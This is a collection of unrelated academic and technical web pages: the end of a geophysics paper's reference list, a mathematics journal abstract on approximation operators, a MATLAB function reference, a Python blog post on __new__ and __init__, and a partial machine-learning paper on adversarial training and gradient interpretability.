(2015) Scaling of viscous shear zones with depth-dependent viscosity and power-law stress–strain-rate dependence. Geophys J Int 202(1):242–260\n\n22. Nakajima J, Hasegawa A (2007) Deep crustal structure along the Niigata–Kobe Tectonic Zone, Japan: its origin and segmentation. Earth Planets Space 59(2):e5\n\n23. Nakajima J, Kato A, Iwasaki T, Ohmi S, Okada T, Takeda T et al (2010) Deep crustal structure around the Atotsugawa fault system, central Japan: a weak zone below the seismogenic zone and its role in earthquake generation. Earth Planets Space 62(7):555–566\n\n24. Ogawa Y, Honkura Y (2004) Mid-crustal electrical conductors and their correlations to seismicity and deformation at Itoigawa–Shizuoka Tectonic Line, central Japan. Earth Planets Space 56(12):1285–1291\n\n25. Ohzono M, Sagiya T, Hirahara K, Hashimoto M, Takeuchi A, Hoso Y, Wada Y, Onoue K, Ohya F, Doke R (2011) Strain accumulation process around the Atotsugawa fault system in the Niigata–Kobe Tectonic Zone, central Japan. Geophys J Int 184(3):977–990\n\n26. Okudaira T, Jeřábek P, Stünitz H, Fusseis F (2015) High-temperature fracturing and subsequent grain-size-sensitive creep in lower crustal gabbros: Evidence for coseismic loading followed by creep during decaying stress in the lower crust? J Geophys Res Solid Earth 120(5):3119–3141\n\n27. Okudaira T, Shigematsu N, Harigane Y, Yoshida K (2017) Grain size reduction due to fracturing and subsequent grain-size-sensitive creep in a lower crustal shear zone in the presence of a Co2-bearing fluid. J Struct Geol 95:171–187. doi:10.1016/j.jsg.2016.11.001\n\n28. Pollitz FF (2001) Viscoelastic shear zone model of a strike-slip earthquake cycle. J Geophys Res 106(26):526–541\n\n29. Rohrer GS (2010) Introduction to grains, phases, and interfacesan interpretation of microstructure. Trans Aime, 1948, vol 175, pp 15–51, by cs smith. Metall Mater Trans A 41(5):1063–1100\n\n30. Rutter E (1999) On the relationship between the formation of shear zones and the form of the flow law for rocks undergoing dynamic recrystallization. Tectonophysics 303(1):147–158\n\n31. Rybacki E, Gottschalk M, Wirth R, Dresen G (2006) Influence of water fugacity and activation volume on the flow properties of fine-grained anorthite aggregates. J Geophys Res Solid Earth 111(B3):B03203\n\n32. 
Savage J, Burford R (1973) Geodetic determination of relative plate motion in central California. J Geophys Res 78(5):832–845\n\n33. Shimada K, Tanaka H, Toyoshima T, Obara T, Niizato T (2004) Occurrence of mylonite zones and pseudotachylyte veins around the base of the upper crust: An example from the southern Hidaka metamorphic belt, Samani area, Hokkaido, Japan. Earth Planets Space 56(12):1217–1223\n\n34. Takahashi Y (2015) Geotectonic evolution of the Nihonkoku Mylonite Zone of north central Japan based on geology, geochemistry, and radiometric ages of the Nihonkoku Mylonites. In: Mukherjee S, Mulchrone KF (eds) Ductile shear zones: from micro- to macro-scales. Wiley, Chichester, UK\n\n35. Takeuchi CS, Fialko Y (2012) Dynamic models of interseismic deformation and stress transfer from plate motion to continental transform faults. J Geophys Res Solid Earth 117(B5):B05403\n\n36. Takeuchi CS, Fialko Y (2013) On the effects of thermally weakened ductile shear zones on postseismic deformation. J Geophys Res Solid Earth 118(12):6295–6310\n\n37. Tanaka A, Yamano M, Yano Y, Sasada M (2004) Geothermal gradient and heat flow data in and around Japan (i): Appraisal of heat flow from geothermal gradient data. Earth Planets Space 56(12):1191–1194\n\n38. Thatcher W, England PC (1998) Ductile shear zones beneath strike-slip faults: implications for the thermomechanics of the San Andreas Fault Zone. J Geophys Res Solid Earth 103(B1):891–905\n\n39. Tullis J, Yund RA (1982) Grain growth kinetics of quartz and calcite aggregates. J Geol 90:301–318\n\n40. White S (1979) Grain and sub-grain size variations across a mylonite zone. Contrib Mineral Petrol 70(2):193–202\n\n41. White S, Burrows S, Carreras J, Shaw N, Humphreys F (1980) On mylonites in ductile shear zones. J Struct Geol 2(1–2):175–187\n\n42. Wittlinger G, Tapponnier P, Poupinet G, Mei J, Danian S, Herquel G, Masson F (1998) Tomographic evidence for localized lithospheric shear along the Altyn Tagh fault. Science 282(5386):74–76\n\n43. Yoshimura R, Oshiman N, Uyeshima M, Toh H, Uto T, Kanezaki H, Mochido Y, Aizawa K, Ogawa Y, Nishitani T et al (2009) Magnetotelluric transect across the Niigata-Kobe tectonic zone, central Japan: a clear correlation between strain accumulation and resistivity structure. Geophys Res Lett 36(20):L20311\n\n44. Yuen D, Fleitout L, Schubert G, Froidevaux C (1978) Shear deformation zones along major transform faults and subducting slabs. Geophys J Int 54(1):93–119\n\n## Authors' contributions\n\nXZ constructed the numerical model for the study, conducted all numerical experiments and drafted the manuscript. TS conceived of the study, participated in its design and coordination and helped to draft the manuscript. Both authors read and approved the final manuscript.\n\n## Author information\n\nCorrespondence to Xuelei Zhang.\n\n## Ethics declarations\n\n### Acknowledgements\n\nThe authors would like to thank T. Ito and R. Sasajima for providing kind supervision, helpful comments, and continued support. Constructive reviews by J. Muto, T. Okudaira, and an anonymous reviewer improved the manuscript. This study was supported by JSPS KAKENHI Grant Number 261090003. 
The corresponding author was supported by a Japanese Government Scholarship for his study in Japan.

### Competing interests

The authors declare that they have no competing interests.

### Publisher’s Note

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
https://www.lhscientificpublishing.com/journals/articles/DOI-10.5890-DNC.2021.12.006.aspx
ISSN:2164-6376 (print)
ISSN:2164-6414 (online)
Discontinuity, Nonlinearity, and Complexity

Dimitry Volchenkov (editor), Dumitru Baleanu (editor)

Dimitry Volchenkov (editor)

Mathematics & Statistics, Texas Tech University, 1108 Memorial Circle, Lubbock, TX 79409, USA

Email: [email protected]

Dumitru Baleanu (editor)

Cankaya University, Ankara, Turkey; Institute of Space Sciences, Magurele-Bucharest, Romania

A Study of Approximation Properties of Beta Type Summation-Integral Operator

Discontinuity, Nonlinearity, and Complexity 10(4) (2021) 649–662 | DOI:10.5890/DNC.2021.12.006

Dhawal J. Bhatt$^{1,2}$, Vishnu Narayan Mishra$^{3}$, Ranjan Kumar Jana$^{1}$

$^{1}$ Applied Mathematics and Humanities Department, Sardar Vallabhbhai National Institute of Technology, Ichchhanath, Surat-395 007, Gujarat, India

$^{2}$ Present address: Department of Mathematics, St. Xavier's College, Navrangpura, Ahmedabad-380 009, Gujarat, India

$^{3}$ Department of Mathematics, Indira Gandhi National Tribal University, Lalpur, Amarkantak, Anuppur-484 887, Madhya Pradesh, India

Abstract

In the present paper, we introduce a Durrmeyer-type operator involving the beta function and the Baskakov basis function, and we study its approximation properties. We obtain the rate of convergence in different terms. The uniform convergence of the sequence of these operators is established using Korovkin's theorem. The order of approximation for functions of some special classes is also obtained. We establish a Voronovskaja-type asymptotic result for this operator and a direct estimate of approximation for the sequence of these operators.

References

1. Szász, O. (1950), Generalizations of S. Bernstein's polynomial to the infinite interval, J. Res. Nat. Bur. Standards, 45, 239-245.
2. Baskakov, V.A. (1957), An example of a sequence of linear positive operators in the space of continuous functions, Dokl. Akad. Nauk SSSR, 113, 249-251.
3. Durrmeyer, J.L. (1967), Une formule d'inversion de la transformée de Laplace: applications à la théorie des moments, Thèse de 3e cycle, Faculté des Sciences de l'Université de Paris.
4. Bernstein, S.N. (1912), Démonstration du théorème de Weierstrass fondée sur le calcul des probabilités, Comm. Soc. Math. Charkow Ser., 13(2), 1-2.
5. Prasad, G., Agrawal, P.N., and Kasana, H.S. (1983), Approximation of functions on $[0,\infty)$ by a new sequence of modified Szász operators, Math. Forum, 6(2), 1-11.
6. Gupta, V. and Srivastava, G.S. (1993), Simultaneous approximation by Baskakov-Szász type operators, Bull. Math. Soc. Sci. de Roumanie (N.S.), 37(85)(3-4), 73-85.
7. Agrawal, P.N. and Mohammad, A.J. (2003), On $L_p$ approximation by a linear combination of a new sequence of linear positive operators, Turk. J. Math., 27, 389-405.
8. Gairola, A.R. and Mishra, L.N. (2016), Rate of Approximation by Finite Iterates of q-Durrmeyer Operators, Proc. Natl. Acad. Sci., India, Sect. A Phys. Sci. (April-June 2016), 86(2), 229-234. DOI:10.1007/s40010-016-0267-z.
9. Gairola, A.R. and Mishra, L.N. (2018), On the $q$-derivatives of a certain linear positive operators, Iranian Journal of Science & Technology, Transactions A: Science, 42(3), 1409-1417. DOI:10.1007/s40995-017-0227-8.
10. Gupta, V., Deo, N., and Zeng, X.M. (2013), Simultaneous approximation for Szász-Mirakian-Stancu-Durrmeyer operators, Anal. Theory Appl., 29(1), 86-96.
11. Gupta, V. and Gupta, P. (2001), Direct theorem in simultaneous approximation for Szász-Mirakyan-Baskakov type operators, Kyungpook Math. J., 41(2), 243-249.
12. Gupta, V. and Lupas, A. (2005), Direct results for mixed Beta-Szász type operators, Gen. Math., 13(2), 83-94.
13. Gupta, V. and Srivastava, G.S. (1995), On convergence of derivatives by Szász-Mirakyan-Baskakov type operators, Math. Stud., 64(1-4), 195-205.
14. Gupta, V. and Tachev, G. (2014), Approximation by Szász-Mirakyan-Baskakov operators, J. Appl. Funct. Anal., 9(3-4), 308-309.
15. Kumar, A. and Mishra, L.N. (2017), Approximation by modified Jain-Baskakov-Stancu operators, Tbilisi Mathematical Journal, 10(2), 185-199.
16. Kumar, A., Tapiawala, D., and Mishra, L.N. (2018), Direct estimates for certain integral type operators, European Journal of Pure and Applied Mathematics, 11(4), 958-975.
17. Mishra, L.N. and Kumar, A. (2019), Direct estimates for Stancu variant of Lupaş-Durrmeyer operators based on Polya distribution, Khayyam J. Math., 5(2), 51-64. DOI:10.22034/KJM.2019.85886.
18. Mishra, V.N., Khatri, K., Mishra, L.N., and Deepmala (2013), Inverse result in simultaneous approximation by Baskakov-Durrmeyer-Stancu operators, Journal of Inequalities and Applications, 2013, 586. DOI:10.1186/1029-242X-2013-586.
19. Mishra, V.N., Khatri, K., and Mishra, L.N. (2013), Statistical approximation by Kantorovich type discrete $q$-Beta operators, Advances in Difference Equations, 2013, 345. DOI:10.1186/1687-1847-2013-345.
20. Korovkin, P.P. (1953), On Convergence of Linear Positive Operators in the Space of Continuous Functions, Dokl. Akad. Nauk, 90, 961-964.
21. Mazhar, S.M. and Totik, V. (1985), Approximation by modified Szász operators, Acta Sci. Math., 49, 257-269.
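For readers unfamiliar with the ingredients named in the abstract, the standard Baskakov basis functions and the Euler beta function, together with the generic shape of a Baskakov-beta summation-integral (Durrmeyer-type) operator, are sketched below. This is only an orientation; the exact kernel, normalization, and index conventions used by the authors are not reproduced here.

\begin{aligned} p_{n,k}(x)=\binom{n+k-1}{k}\,\frac{x^{k}}{(1+x)^{n+k}},\quad x\in[0,\infty), \qquad B(a,b)=\int_{0}^{1}t^{a-1}(1-t)^{b-1}\,{\rm d}t, \\ L_{n}(f;x)=\sum_{k=0}^{\infty}p_{n,k}(x)\int_{0}^{\infty}b_{n,k}(t)\,f(t)\,{\rm d}t, \qquad \text{e.g. } b_{n,k}(t)=\frac{1}{B(k+1,n)}\,\frac{t^{k}}{(1+t)^{n+k+1}}, \end{aligned}

where $b_{n,k}$ is a beta-type kernel normalized so that it integrates to one on $[0,\infty)$; operators of this form are then studied through their moments, rates of convergence, and Voronovskaja-type asymptotics.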
https://nl.mathworks.com/help/reinforcement-learning/ref/rl.util.rllayerrepresentation.getlearnableparametervalues.html
# getLearnableParameterValues

Obtain learnable parameter values from policy or value function representation

## Syntax

``val = getLearnableParameterValues(rep)``

## Description

`val = getLearnableParameterValues(rep)` returns the values of the learnable parameters from the reinforcement learning policy or value function representation `rep`.

## Examples

Assume that you have an existing trained reinforcement learning agent. For this example, load the trained agent from Train DDPG Agent to Control Double Integrator System.

`load('DoubleIntegDDPG.mat','agent')`

Obtain the critic representation from the agent.

`critic = getCritic(agent);`

Obtain the learnable parameters from the critic.

`params = getLearnableParameterValues(critic);`

Modify the parameter values. For this example, simply multiply all of the parameters by `2`.

`modifiedParams = cellfun(@(x) x*2,params,'UniformOutput',false);`

Set the parameter values of the critic to the new modified values.

`critic = setLearnableParameterValues(critic,modifiedParams);`

Set the critic in the agent to the new modified critic.

`agent = setCritic(agent,critic);`

Assume that you have an existing trained reinforcement learning agent. For this example, load the trained agent from Train DDPG Agent to Control Double Integrator System.

`load('DoubleIntegDDPG.mat','agent')`

Obtain the actor representation from the agent.

`actor = getActor(agent);`

Obtain the learnable parameters from the actor.

`params = getLearnableParameterValues(actor);`

Modify the parameter values. For this example, simply multiply all of the parameters by `2`.

`modifiedParams = cellfun(@(x) x*2,params,'UniformOutput',false);`

Set the parameter values of the actor to the new modified values.

`actor = setLearnableParameterValues(actor,modifiedParams);`

Set the actor in the agent to the new modified actor.

`agent = setActor(agent,actor);`

## Input Arguments

Policy or value function representation, specified as one of the following:

• `rlLayerRepresentation` object for deep neural network representations

• `rlTableRepresentation` object for value table or Q table representations

To create a policy or value function representation, use one of the following methods:

## Output Arguments

Learnable parameter values for the representation object, returned as a cell array. You can modify these parameter values and set them in the original agent or a different agent using the `setLearnableParameterValues` function.
https://radekbialowas.com/articles/python-__new__-vs-__init__/
# Python __new__ vs __init__

The constructor in Python is composed of two methods, `__new__` and `__init__`, executed one after the other. `__new__` creates an instance, which is then passed to `__init__`.

Let's review the properties and use cases of this somewhat exotic part of Python.

## __new__ basic information

First of all, `__new__` is a static method, therefore its first argument is a reference to the class it is called on, widely named `cls`.

The remaining arguments come from the class call itself, so if `__init__` takes arguments, you must define the same parameters in `__new__`. Because of this, the next block of code will throw an exception:

`TypeError: __new__() takes 1 positional argument but 2 were given`

```
class Point:
    def __new__(cls):
        ...

    def __init__(self, x):
        self.x = x

Point(5)
```

The value that `__new__` returns is the value returned from calling the class, which may lead to messy code, but we will get to that later.

```
class Dummy:
    def __new__(cls):
        return 1

print(Dummy() == 1)

# Outputs:
# True
```

So, in consequence, if `__new__` does not return an instance of the class on which it is called, `__init__` will not be called.

```
class Dummy:
    ...

class MyClass:
    def __new__(cls):
        return Dummy()

    def __init__(self):
        print('Will not be printed')

print(isinstance(MyClass(), Dummy))

# Outputs:
# True
```

## Instance type based on constructor arguments

The first example smacks of an anti-pattern because the returned value is of a different type than the class that is called. Let's focus on the behavior of the methods for now.

If the sides of the rectangle are equal, then isn't it better to return a square?

```
class Square:
    def __init__(self, side_length):
        self.side_length = side_length

class Rectangle:
    def __new__(cls, width: float, height: float):
        if width == height:
            return Square(side_length=width)

        return object.__new__(Rectangle)

    def __init__(self, width: float, height: float):
        self.width = width
        self.height = height

r1 = Rectangle(2, 3)
r2 = Rectangle(2, 2)

print(type(r1))
print(type(r2))

# Outputs:
# <class '__main__.Rectangle'>
# <class '__main__.Square'>
```

## Usage in the Singleton design pattern

The purpose of the Singleton pattern is to limit the number of instances created. There are plenty of implementations of it, mostly using `__init__`.

One of the most interesting implementations of this pattern, drawing on Python's "Simple is better than complex" credo, involves immediately deleting the class after creating an instance. Of course, this has its drawback, as it does not allow for lazy loading. But it is short and simple:

```
class Singleton:
    def __init__(self, *args, **kwargs):
        pass

singleton_instance = Singleton()
del Singleton
```

Back on topic, here's an implementation of Singleton using `__new__`:

```
class Singleton:
    _instance = None  # Keep instance reference

    def __new__(cls, *args, **kwargs):
        if not cls._instance:
            cls._instance = super().__new__(cls)
        return cls._instance

s1 = Singleton()
s2 = Singleton()

print(s1 == s2)  # → True
```

## Inheritance caveats

The previous examples can be implemented in other ways without being aware of `__new__` itself.
But now I will present you with situations in which `__new__` is irreplaceable.

Suppose that `SubClass` inherits from `BaseClass`:

```
class BaseClass:
    pass

class SubClass(BaseClass):
    pass

isinstance(SubClass(), BaseClass)  # True
```

Next, you want to know whether a call to the `BaseClass` constructor comes from `BaseClass` itself or from an inheriting class.

```
class BaseClass:
    def __new__(cls):
        obj = super(BaseClass, cls).__new__(cls)
        obj._from_base_class = type(obj) == BaseClass
        return obj

class SubClass(BaseClass):
    ...

base_instance = BaseClass()
sub_instance = SubClass()

print(base_instance._from_base_class)  # True
print(sub_instance._from_base_class)  # False
```

Why can't this be implemented using `__init__`? Because the `self` in `__init__` is already an instance. In other words, once you are in `__init__`, it is too late to track the class which was used to create the instance.

## Inheriting from immutable types

`__new__` allows us to modify the returned value. If we want to customize the creation of immutable types, `__init__` is useless, because at that point in the constructor it is too late: we already have an immutable instance. That is why we need the `__new__` method.

So let's create a `PositiveNumberTuple` class that meets the following requirements:

1. Inherits from tuple
2. Stores only float values
3. Filters out values smaller than zero
4. Stores information about how many values were skipped

```
class PositiveNumberTuple(tuple):  # 1
    def __new__(cls, *numbers):
        skipped_values_count = 0  # 4
        positive_numbers = []
        for x in numbers:
            if x >= 0:  # 2, 3
                positive_numbers.append(x)
            else:
                skipped_values_count += 1

        instance = super().__new__(cls, tuple(positive_numbers))

        instance.skipped_values_count = skipped_values_count

        return instance

positive_ints_tuple = PositiveNumberTuple(-2, -1, 0, 1, 2)

print(positive_ints_tuple)  # -> (0, 1, 2)
print(type(positive_ints_tuple))  # -> <class '__main__.PositiveNumberTuple'>
print(positive_ints_tuple.skipped_values_count)  # -> 2
```

## Conclusions

In summary, it is easy to abuse `__new__`: the set of use cases in which it cannot be replaced by a more common construct is very narrow. However, as you have seen, it exists for a reason.
https://deepai.org/publication/bridging-adversarial-robustness-and-gradient-interpretability
Adversarial training is a training scheme designed to counter adversarial attacks by augmenting the training dataset with adversarial examples. Surprisingly, several studies have observed that loss gradients from adversarially trained DNNs are visually more interpretable than those from standard DNNs. Although this phenomenon is interesting, there are only a few works that have offered an explanation. In this paper, we attempted to bridge this gap between adversarial robustness and gradient interpretability. To this end, we identified that loss gradients from adversarially trained DNNs align better with human perception because adversarial training restricts gradients closer to the image manifold. We then demonstrated that adversarial training causes loss gradients to be quantitatively meaningful. Finally, we showed that under the adversarial training framework, there exists an empirical trade-off between test accuracy and loss gradient interpretability and proposed two potential approaches to resolving this trade-off.

## 1 Introduction

An adversarial perturbation is an imperceptible perturbation to the input image which causes a deep neural network (DNN) to misclassify the perturbed input image with high confidence (Goodfellow et al., 2015). Such perturbed inputs are called adversarial examples. Numerous defence approaches have been proposed to create adversarially robust DNNs that are resistant to adversarial attacks. One of the most common and successful defence methods is adversarial training, which augments the training dataset with adversarial examples (Szegedy et al., 2013).

Surprisingly, several studies have observed that loss gradients from adversarially trained DNNs are visually more interpretable than those from standard DNNs, i.e., DNNs trained on natural images (Ross & Doshi-Velez, 2018; Tsipras et al., 2018; Zhang et al., 2019). These studies have used the visual interpretability of gradients as evidence that adversarial training causes DNNs to learn meaningful feature representations which align well with salient data characteristics or human perception.

However, asking whether gradient visualization is meaningful to a human may be entirely different from determining whether it is an accurate description of the internal representation of the DNN. For instance, consider the DNN decision interpretation methods Deconvolution (Zeiler & Fergus, 2014) and Guided Backpropagation (Springenberg et al., 2015). They visualize the importance of each input pixel in the DNN decision process with heat maps produced by calculating imputed versions of the gradient. Although they produce sharp visualizations, they have been proven to be doing partial image recovery which is unrelated to DNN decisions (Nie et al., 2018).

In light of such studies, judging the interpretability of a DNN by the visual quality of its loss gradient runs the risk of being incorrect. There have been few attempts to analyze adversarial training in the context of DNN interpretability. For example, Chalasani et al. (2018) have investigated the effect of adversarial training on network weights.
However, to the best of our knowledge, there is no work which provides thorough analyses of the effect of adversarial training on the visual and quantitative interpretability of DNN loss gradients.

In this paper, we attempted to bridge this gap between adversarial robustness and gradient interpretability through a series of experiments that addresses the following questions: “why do loss gradients from adversarially trained networks align better with human perception?”, “is there a relation between the strength of the adversary used for training and the perceptual quality of gradients?” and, most importantly, “does adversarial training really cause loss gradients to better reflect the internal representation of the DNN?”. (All code for the experiments in this paper is public at https://github.com/1202kbs/Robustness-and-Interpretability.) We then ended the paper by identifying a trade-off between test accuracy and loss gradient interpretability and proposing two potential approaches to resolving this trade-off. Specifically, we have the following three contributions:

1. Visual Interpretability. We showed that loss gradients from adversarially trained networks align better with human perception because adversarial training causes loss gradients to lie closer to the image manifold. We also provided a conjecture for this phenomenon and showed its plausibility with a toy dataset.

2. Quantitative Interpretability. We showed that loss gradients from adversarially trained networks are quantitatively meaningful. To this end, we established a formal framework for quantifying how accurately gradients reflect the internal representation of the DNN. We then verified whether gradients from adversarially trained networks are quantitatively meaningful using this framework.

3. Accuracy and Interpretability Trade-off. We showed with CNNs trained on CIFAR-10 that under the adversarial training framework, there exists an empirical trade-off between test accuracy and loss gradient interpretability. Then based on the experiment results, we proposed two potential approaches to resolving this trade-off.

## 2 Visual Interpretability of Loss Gradients

We start by answering why adversarially trained DNNs have loss gradients that align better with human perception. All experiment settings in this paper can be found in the Appendix.

To identify why adversarial training enhances the perceptual quality of loss gradients, we hypothesized that adversarial examples from adversarially trained networks lie closer to the image manifold. Note that the loss gradient is the difference between the original image and the adversarial image. Hence if the adversarial image lies closer to the image manifold, the loss gradient should align better with human perception.

Following the previous works of Tsipras et al. (2018) and Stutz et al. (2018), we first trained DNNs against adversarial attacks which maximize the training loss / cross entropy (XEnt) loss or the CW surrogate objective proposed by Carlini & Wagner (2017). These objectives are maximized using Projected Gradient Descent (PGD) (Kurakin et al., 2016) such that the adversarial examples stay within ℓ2- or ℓ∞-distance of ϵ from the original image. We say an adversary, or an adversarial attack, is stronger if its ϵ is larger. For consistency of observations, we trained the DNNs on three datasets: MNIST (LeCun et al., 1998), FMNIST (Xiao et al., 2017) and CIFAR-10 (Krizhevsky & Hinton, 2009).
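For concreteness, a minimal ℓ∞-bounded PGD sketch of the kind of attack described above is given below. It is an illustrative reconstruction written by us (the function and variable names are ours, and the ℓ2 variant is analogous), not the authors' implementation, which is available at the repository linked above.

```
import torch

def pgd_linf(model, loss_fn, x, y, eps, step_size, n_steps):
    """Illustrative L-inf PGD: maximize loss_fn within an eps-ball around x."""
    x_adv = x.clone().detach()
    for _ in range(n_steps):
        x_adv.requires_grad_(True)
        loss = loss_fn(model(x_adv), y)          # e.g., XEnt loss or a CW surrogate objective
        grad = torch.autograd.grad(loss, x_adv)[0]
        with torch.no_grad():
            x_adv = x_adv + step_size * grad.sign()                 # ascent step (sign -> L-inf geometry)
            x_adv = torch.min(torch.max(x_adv, x - eps), x + eps)   # project back into the eps-ball
            x_adv = x_adv.clamp(0.0, 1.0)                           # keep a valid image
    return x_adv.detach()
```

In adversarial training, the clean minibatch is then replaced (or augmented) with `x_adv` at each optimization step.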
Specific adversarial training procedures are described in Appendix B.1.

Then, we trained a VAE-GAN (Larsen et al., 2016) on each dataset. Using its encoder and decoder, we projected an image or an adversarial example onto the approximated manifold by passing it through the encoder and then the decoder. (The projection can instead be defined as the decoder output closest to the image over all latent codes, but either definition led to the same results.) Next, we computed the distance between an image and its projection to quantify how close the image is to the image manifold. Note that this concept of using a generative model to obtain an image's projection to the manifold has also been applied frequently in the context of adversarial defense (Song et al., 2017; Meng & Chen, 2017; Samangouei et al., 2018).

Figure 1 compares the distributions of this distance for the test images and for their adversarial examples from standard or adversarially trained DNNs. We only analyzed ℓ2-bounded attacks maximizing the XEnt loss, since ℓ2-bounded attacks represent the original direction of the loss gradient while ℓ∞-bounded attacks modify the gradient through clipping. Attacks which failed to change the prediction are removed since they are likely to be zero matrices due to loss function saturation.

It can be observed from Figure 1 that, for all datasets, adversarial examples for adversarially trained DNNs lie closer to the image manifold than those for standard DNNs. This suggests that adversarial training restricts loss gradients to the image manifold. Hence gradients from adversarially trained DNNs are more visually interpretable. Interestingly, it can also be observed that using stronger attacks during training reduces the distance between adversarial examples and their projections even further. That is, the adversarial examples from more robust DNNs look more natural, as shown in Figure 2. We now provide a conjecture for these phenomena.

### 2.2 A Conjecture Under the Boundary Tilting Perspective

In this section, we propose a conjecture for why adversarial training confines the gradient to the manifold. Our conjecture is based on the boundary tilting perspective on the phenomenon of adversarial examples (Tanay & Griffin, 2016). Figure 2(a) illustrates the boundary tilting perspective. Adversarial examples exist because the decision boundary of a standard DNN is “tilted” along directions of low variance in the data (standard decision boundary). Under certain situations, the decision boundary will lie close to the data such that a small perturbation directed toward the boundary will cause the data to cross the boundary. Moreover, since the decision boundary is tilted, the perturbed data will leave the image manifold.

Under the boundary tilting perspective and the observations of Section 2.1, we present a new conjecture on the relationship between adversarial training and visual interpretability of loss gradients: adversarial training removes tilting along directions of low variance in the data (robust decision boundary). Intuitively, this makes sense because a network is robust when only large-ϵ attacks are able to cause a nontrivial drop in accuracy, and this happens when data points of different classes are mirror images of each other with respect to the decision boundary. Since the loss gradient is generally perpendicular to the decision boundary, it will be confined to the image manifold and thus adversarial examples stay within the image manifold.

As a sanity check, we tested our conjecture with a 2-dimensional toy dataset. Specifically, we trained three two-layer ReLU networks to classify points from two distinct bivariate Gaussian distributions.
The first network is trained on the original data, and the latter two networks are trained against weak and strong adversaries. We then compared the resulting decision boundaries and the distribution of adversarial examples. Specific adversarial training procedures are described in Appendix B.2.

The training data and the results are shown in Figure 2(b). The decision boundary of the standard network is tilted along directions of low variance in the data. Naturally, the adversarial examples leave the data manifold. On the other hand, adversarial training removes the tilt. Hence adversarial perturbations move data points to the manifold of the other class. We also observed that training against a stronger adversary removes the tilt to a larger degree. This causes adversarial examples to align better with the data manifold. Hence the decision boundary tilting perspective may also account for why adversarial training with a stronger attack reduces the distance between an adversarial example and its projection even further (Figure 1). We leave more theoretical justification and deeper experimental validation of our observations and hypothesis for future work.

If our conjecture is true, adversarial training prevents the decision boundary from tilting. Hence adversarial examples are restricted to the image manifold and thus loss gradients align better with human perception. However, as we have discussed in Section 1, visual sharpness of gradients does not imply that they accurately represent the features learned by the DNN. We address this issue in the next section by quantitatively evaluating the interpretability of loss gradients.

## 3 Interpretability of Adversarially Trained Networks

To the best of our knowledge, there are no works on quantifying the interpretability of loss gradients. However, the quantitative interpretability of logit gradients and their variants has been thoroughly studied in the context of attribution methods (Bach et al., 2015; Samek et al., 2017; Adebayo et al., 2018; Hooker et al., 2018). (Attribution methods are DNN decision interpretation methods which assign a signed attribution value to each input feature, i.e., pixel. An attribution value quantifies the amount of influence of the corresponding feature on the final decision. Since each pixel is assigned an attribution value, we can visualize the attributions by arranging them to have the same shape as the input.) Since the loss gradient highlights the input features which affect the loss most strongly, and thus are important for the DNN's prediction, we may also treat it as an attribution method. This allows us to extend the reasoning and techniques in works on attribution method evaluation to the loss gradient. (Since the loss gradient is a linear combination of logit gradients, we can reasonably expect most observations for loss gradients to hold for logit gradients as well, and vice versa. However, loss gradients have the nice property of being generally perpendicular to the decision boundary, which gives us additional insights such as those in Section 2.2. Hence we have chosen to examine loss gradients, not logit gradients.)

### 3.1 Formal Description of the Quantitative Evaluation Framework

We denote vectors or vector-valued functions by boldface letters. Let F, G and M denote families of DNNs, attribution methods and attribution method evaluation metrics. A DNN f ∈ F maps an image x ∈ ℝ^D to a vector of class logits f(x) ∈ ℝ^K, where D is the input dimension and K is the number of classes.
Then an attribution method g ∈ G maps the tuple (f, x) to a vector of attribution scores g(f, x) ∈ ℝ^D. Finally, an attribution method evaluation metric μ ∈ M assigns to each tuple (f, g) a scalar μ(f, g) indicating how accurately g reflects the internal representation of f. A higher value of μ(f, g) indicates that the attribution method better describes the internal representation of the DNN.

Here, note that the value of μ(f, g) depends on both f and g. Previous works have focused on improving the value of μ for fixed f by developing better and more complex g (Bach et al., 2015; Sundararajan et al., 2017; Smilkov et al., 2017; Shrikumar et al., 2017). However, we can also improve the value of μ for fixed g by varying f through changing the network topology, training scheme, etc. It is only recently that the latter approach has started to receive attention. In the next section, we investigate this approach in the context of adversarial training.

Here we experimentally evaluate whether loss gradients from adversarially trained DNNs are truly more interpretable than those from standard DNNs. Using the definitions from the previous section, we can rephrase this goal as follows: let F_std be the family of standard DNNs and let F_adv be the family of adversarially trained DNNs, all of the same architecture. Given an attribution method g, we want to verify whether μ(f_adv, g) > μ(f_std, g) for f_adv ∈ F_adv and f_std ∈ F_std. In particular, we are interested in the case when g is the loss gradient with respect to the input, where the loss is the XEnt loss. We denote this attribution method by g_G. We also evaluate a variant, Gradient ⊙ Input (Shrikumar et al., 2017), i.e., the element-wise product of the input and the loss gradient. We denote Gradient ⊙ Input using the XEnt loss by g_GX.

Figure 4: Effect of adversarial training on interpretability of g_G and g_GX. The x-axis indicates ϵ (attack strength) used during training. The values of ϵ are scaled into [0,1] such that ℓ2-bounded attacks and ℓ∞-bounded attacks are comparable. Note that ϵ=0 is standard training. The y-axis indicates quantitative interpretability, as explained in the text. We also show the linear correlation coefficient and Spearman's rank correlation coefficient for each combination of adversarial training setting (norm and objective) and attribution method (G for g_G and GX for g_GX).

We quantified the interpretability of each method via two attribution method evaluation metrics, Remove and Retrain (ROAR) and Keep and Retrain (KAR) (Hooker et al., 2018). Specifically, we measured how the performance of the classifier changed as features were occluded based on the ordering assigned by the attribution method. For ROAR, we replaced a fraction of all CIFAR-10 pixels estimated to be most important with a constant value. For KAR, we replaced the pixels estimated to be least important. We then retrained a CNN on the modified dataset and measured the change in test accuracy. We trained three CNNs per attribution method for each fraction and measured test accuracy as the average of these three CNNs.
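To make the occlusion step concrete, a minimal sketch is given below. It is a hypothetical illustration of ROAR/KAR-style masking written by us, not the authors' code: attribution maps are assumed to be precomputed, the constant fill value is taken to be the per-channel dataset mean, and the retraining step is omitted.

```
import numpy as np

def occlude(images, attributions, fraction, remove_most_important=True):
    """Occlude a fraction of pixels per image, ranked by attribution magnitude.

    remove_most_important=True  -> ROAR-style occlusion.
    remove_most_important=False -> KAR-style occlusion.
    images: (N, H, W, C) array; attributions: same shape.
    """
    out = images.copy()
    n_pix = images.shape[1] * images.shape[2]
    k = int(round(fraction * n_pix))
    if k == 0:
        return out
    fill = images.mean(axis=(0, 1, 2))                      # per-channel constant fill value
    for img, attr in zip(out, attributions):
        score = np.abs(attr).sum(axis=-1).ravel()           # rank pixels by attribution magnitude
        order = np.argsort(score)                           # ascending: least important first
        drop = order[-k:] if remove_most_important else order[:k]
        rows, cols = np.unravel_index(drop, images.shape[1:3])
        img[rows, cols, :] = fill                           # modify in place (img is a view into out)
    return out
```

A classifier is then retrained from scratch on the occluded dataset for each fraction, and the interpretability scores are computed from the resulting accuracy curves as described next.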
